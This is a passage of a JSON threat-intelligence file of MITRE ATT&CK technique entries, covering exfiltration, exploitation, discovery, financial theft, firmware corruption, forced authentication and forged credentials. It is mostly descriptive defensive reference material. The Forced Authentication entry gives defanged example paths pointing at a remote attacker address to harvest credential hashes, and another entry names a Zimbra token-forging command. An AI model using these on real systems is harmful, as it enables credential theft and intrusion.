"description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
                    "type": "uses"
                }
            ],
            "uuid": "89203cae-d3f1-4eef-9b5a-29042eb05d19",
            "value": "Exfiltration Over C2 Channel"
        },
        {
"description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
                    "type": "uses"
                }
            ],
            "uuid": "d8541e2d-6bdd-4ec0-95c4-c0f657502d5f",
            "value": "Exfiltration Over Other Network Medium"
        },
        {
"description": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
                    "type": "uses"
                }
            ],
            "uuid": "36e0e8c0-ed8c-42b5-8bbf-b7cb322bc26f",
            "value": "Exfiltration Over Physical Medium"
        },
        {
"description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\n\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
            "meta": {
                "platforms": [
                    "Google Workspace",
                    "Linux",
                    "macOS",
                    "Office 365",
                    "SaaS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
                    "type": "uses"
                }
            ],
            "uuid": "66768217-acdd-4b52-902f-e29483630ad6",
            "value": "Exfiltration Over Web Service"
        },
        {
            "description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly use to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) and [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
                    "type": "uses"
                }
            ],
            "uuid": "068df3d7-f788-44e4-9e6b-2ae443af1609",
            "value": "Exploitation for Client Execution"
        },
        {
            "description": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. \n\nCredentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.<sup>[[Technet MS14-068](https://app.tidalcyber.com/references/db78c095-b7b2-4422-8473-49d4a1129b76)]</sup><sup>[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]</sup> Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.<sup>[[Bugcrowd Replay Attack](https://app.tidalcyber.com/references/ed31056c-23cb-5cb0-9b70-f363c54b27f7)]</sup><sup>[[Comparitech Replay Attack](https://app.tidalcyber.com/references/a9f0b569-8f18-579f-bf98-f4f9b93e5524)]</sup><sup>[[Microsoft Midnight Blizzard Replay Attack](https://app.tidalcyber.com/references/5af0008b-0ced-5d1d-bbc9-6c9d60835071)]</sup>\n\nSuch exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.<sup>[[Storm-0558 techniques for unauthorized email access](https://app.tidalcyber.com/references/74fd79a9-09f7-5149-a457-687a1e2989de)]</sup>\n\nExploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.",
            "meta": {
                "platforms": [
                    "Azure AD",
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
                    "type": "uses"
                }
            ],
            "uuid": "afdfa503-0464-4b42-a79c-a6fc828492ef",
            "value": "Exploitation for Credential Access"
        },
        {
"description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.\n\nThere have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries <sup>[[Salesforce zero-day in facebook phishing attack](https://app.tidalcyber.com/references/cbd360bb-f4b6-5326-8861-b05f3a2a8737)]</sup>, evade security logs <sup>[[Bypassing CloudTrail in AWS Service Catalog](https://app.tidalcyber.com/references/de50bd67-96bb-537c-b91d-e541a717b7a1)]</sup>, or deploy hidden infrastructure.<sup>[[GhostToken GCP flaw](https://app.tidalcyber.com/references/3f87bd65-4194-5be6-93a1-acde6eaef547)]</sup>",
            "meta": {
                "platforms": [
                    "IaaS",
                    "Linux",
                    "macOS",
                    "SaaS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
                    "type": "uses"
                }
            ],
            "uuid": "15b65bf2-dbe5-47bc-be09-ed97684bf391",
            "value": "Exploitation for Defense Evasion"
        },
        {
            "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\n\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup><sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup> Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) or [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f).",
            "meta": {
                "platforms": [
                    "Containers",
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
                    "type": "uses"
                }
            ],
            "uuid": "9cc715d7-9969-485f-87a2-c9f7ed3cc44c",
            "value": "Exploitation for Privilege Escalation"
        },
        {
            "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://app.tidalcyber.com/technique/5bab1234-8d1e-437f-88a0-d527b2dfc6cd) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB <sup>[[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)]</sup> and RDP <sup>[[NVD CVE-2017-0176](https://app.tidalcyber.com/references/82602351-0ab0-48d7-90dd-f4536b4d009b)]</sup> as well as applications that may be used within internal networks such as MySQL <sup>[[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)]</sup> and web server services.<sup>[[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)]</sup>\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c) as a result of lateral movement exploitation as well.",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
                    "type": "uses"
                }
            ],
            "uuid": "51ff4ada-8a71-4801-9cb8-a6e216eaa4e4",
            "value": "Exploitation of Remote Services"
        },
        {
            "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.<sup>[[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)]</sup><sup>[[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)]</sup><sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup><sup>[[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)]</sup> Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391) or [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609).\n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://app.tidalcyber.com/technique/bebaf25b-9f50-4e3b-96cc-cc55c5765b61), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.<sup>[[Mandiant Fortinet Zero Day](https://app.tidalcyber.com/references/7bdc5bbb-ebbd-5eb8-bd10-9087c883aea7)]</sup><sup>[[Wired Russia Cyberwar](https://app.tidalcyber.com/references/28c53a97-5500-5bfb-8aac-3c0bf94c2dfe)]</sup>\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.<sup>[[OWASP Top 10](https://app.tidalcyber.com/references/c6db3a77-4d01-4b4d-886d-746d676ed6d0)]</sup><sup>[[CWE top 25](https://app.tidalcyber.com/references/d8ee8b1f-c18d-48f3-9758-6860cd31c3e3)]</sup>",
            "meta": {
                "platforms": [
                    "Containers",
                    "IaaS",
                    "Linux",
                    "macOS",
                    "Network",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
                    "type": "uses"
                }
            ],
            "uuid": "4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a",
            "value": "Exploit Public-Facing Application"
        },
        {
"description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b) and [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) can also be used externally.<sup>[[MacOS VNC software for Remote Desktop](https://app.tidalcyber.com/references/c1f7fb59-6e61-4a7f-b14d-a3d1d3da45af)]</sup>\n\nAccess to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.<sup>[[Volexity Virtual Private Keylogging](https://app.tidalcyber.com/references/b299f8e7-01da-4d59-9657-ef93cf284cc0)]</sup> Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.<sup>[[Trend Micro Exposed Docker Server](https://app.tidalcyber.com/references/05c8909c-749c-4153-9a05-173d5d7a80a9)]</sup><sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4",
|
||
"value": "External Remote Services"
|
||
},
|
||
{
"description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1",
"value": "Fallback Channels"
},
{
"description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.<sup>[[Windows Commands JPCERT](https://app.tidalcyber.com/references/9d935f7f-bc2a-4d09-a51a-82074ffd7d77)]</sup> Custom tools may also be used to gather file and directory information and interact with the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560). Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>\n\nSome files and directories may require elevated or specific user permissions to access.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "1492c4ba-c933-47b8-953d-6de3db8cfce8",
"value": "File and Directory Discovery"
},
{
"description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.<sup>[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)]</sup><sup>[[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)]</sup> File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), [Boot or Logon Initialization Scripts](https://app.tidalcyber.com/technique/c51f799b-7305-43db-8d3b-657965cad68a), [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).\n\nAdversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.<sup>[[new_rust_based_ransomware](https://app.tidalcyber.com/references/8206240f-c84e-442e-b025-f629e9cc8d91)]</sup><sup>[[bad_luck_blackcat](https://app.tidalcyber.com/references/0d1e9635-b7b6-454b-9482-b1fc7d33bfff)]</sup><sup>[[falconoverwatch_blackcat_attack](https://app.tidalcyber.com/references/9d0ff77c-09e9-4d58-86f4-e2398f298ca9)]</sup><sup>[[blackmatter_blackcat](https://app.tidalcyber.com/references/605b58ea-9544-49b8-b3c8-0a97b2b155dc)]</sup><sup>[[fsutil_behavior](https://app.tidalcyber.com/references/07712696-b1fd-4704-b157-9e420840fb2c)]</sup> ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "cb2e4822-2529-4216-b5b8-75158c5f85ff",
"value": "File and Directory Permissions Modification"
},
{
"description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,<sup>[[FBI-ransomware](https://app.tidalcyber.com/references/54e296c9-edcc-5af7-99be-b118da29711f)]</sup> business email compromise (BEC) and fraud,<sup>[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)]</sup> \"pig butchering,\"<sup>[[wired-pig butchering](https://app.tidalcyber.com/references/dc833e17-7105-5790-b30b-b4fed7fd2d2f)]</sup> bank hacking,<sup>[[DOJ-DPRK Heist](https://app.tidalcyber.com/references/c50d2a5b-1d44-5f18-aaff-4be9f6d3f3ac)]</sup> and exploiting cryptocurrency networks.<sup>[[BBC-Ronin](https://app.tidalcyber.com/references/8e162e39-a58f-5ba0-9a8e-101d4cfa324c)]</sup> \n\nAdversaries may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) to conduct unauthorized transfers of funds.<sup>[[Internet crime report 2022](https://app.tidalcyber.com/references/ef30c4eb-3da3-5c7b-a304-188acd2f7ebc)]</sup> In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.<sup>[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)]</sup> This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.<sup>[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]</sup>\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) <sup>[[NYT-Colonial](https://app.tidalcyber.com/references/58900911-ab4b-5157-968c-67fa69cc122d)]</sup> and [Exfiltration](https://app.tidalcyber.com/tactics/66249a6d-be4e-43ab-a295-349d03a98023) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.<sup>[[Mandiant-leaks](https://app.tidalcyber.com/references/aecc3ffb-c524-5ad9-b621-7228f53e27c3)]</sup> Adversaries may use dedicated leak sites to distribute victim data.<sup>[[Crowdstrike-leaks](https://app.tidalcyber.com/references/a91c3252-94b8-52a8-bb0d-cadac6afa161)]</sup>\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and business disruption.<sup>[[AP-NotPetya](https://app.tidalcyber.com/references/7f1af58a-33fd-538f-b092-789a8776780c)]</sup>",
"meta": {
"platforms": [
"Google Workspace",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9",
"value": "Financial Theft"
},
{
"description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.<sup>[[Symantec Chernobyl W95.CIH](https://app.tidalcyber.com/references/a35cab17-634d-4a7a-a42c-4a4280e8785d)]</sup> Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.\n\nIn general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.<sup>[[dhs_threat_to_net_devices](https://app.tidalcyber.com/references/f1d16045-d365-43d2-bc08-65ba1ddbe0fd)]</sup><sup>[[cisa_malware_orgs_ukraine](https://app.tidalcyber.com/references/ebe89b36-f87f-4e09-8030-a1328c0b8683)]</sup> Depending on the device, this attack may also result in [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34). ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "559c647a-7759-4943-856d-dc717b5a443e",
"value": "Firmware Corruption"
},
{
"description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. <sup>[[Wikipedia Server Message Block](https://app.tidalcyber.com/references/3ea03c65-12e0-4e28-bbdc-17bb8c1e1831)]</sup> This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. <sup>[[Didier Stevens WebDAV Traffic](https://app.tidalcyber.com/references/b521efe2-5c1c-48c5-a2a9-95da2367f537)]</sup> <sup>[[Microsoft Managing WebDAV Security](https://app.tidalcyber.com/references/eeb7cd82-b116-4989-b3fa-968a23f839f3)]</sup>\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://app.tidalcyber.com/technique/02b8e7c1-0db7-43f5-a5bc-531b30395122)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. <sup>[[GitHub Hashjacking](https://app.tidalcyber.com/references/d31f6612-c552-45e1-bf6b-889fe619ab5f)]</sup> With access to the credential hash, an adversary can perform off-line [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) cracking to gain access to plaintext credentials. <sup>[[Cylance Redirect to SMB](https://app.tidalcyber.com/references/32c7626a-b284-424c-8294-7fac37e71336)]</sup>\n\nThere are several different ways this can occur. <sup>[[Osanda Stealing NetNTLM Hashes](https://app.tidalcyber.com/references/991f885e-b3f4-4f3f-b0f9-c9862f918f36)]</sup> Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://app.tidalcyber.com/technique/02b8e7c1-0db7-43f5-a5bc-531b30395122)). The document can include, for example, a request similar to <code>file[:]//[remote address]/Normal.dotm</code> to trigger the SMB request. <sup>[[US-CERT APT Energy Oct 2017](https://app.tidalcyber.com/references/e34ddf0a-a112-4557-ac09-1ff540241a89)]</sup>\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as <code>\\\\[remote address]\\pic.png</code> that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. <sup>[[US-CERT APT Energy Oct 2017](https://app.tidalcyber.com/references/e34ddf0a-a112-4557-ac09-1ff540241a89)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "e732e1d4-fffa-4fc3-b387-47782c821688",
"value": "Forced Authentication"
},
{
"description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e), [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nThe generation of web credentials often requires secret values, such as passwords, [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a), or other cryptographic seed values.<sup>[[GitHub AWS-ADFS-Credential-Generator](https://app.tidalcyber.com/references/340a3a20-0ee1-4fd8-87ab-10ac0d2a50c8)]</sup> Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://app.tidalcyber.com/technique/448dc009-2d3f-5480-aba3-0d80dc4336cd)), or the `zmprov gdpak` command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.<sup>[[AWS Temporary Security Credentials](https://app.tidalcyber.com/references/c6f29134-5af2-42e1-af4f-fbb9eae03432)]</sup><sup>[[Zimbra 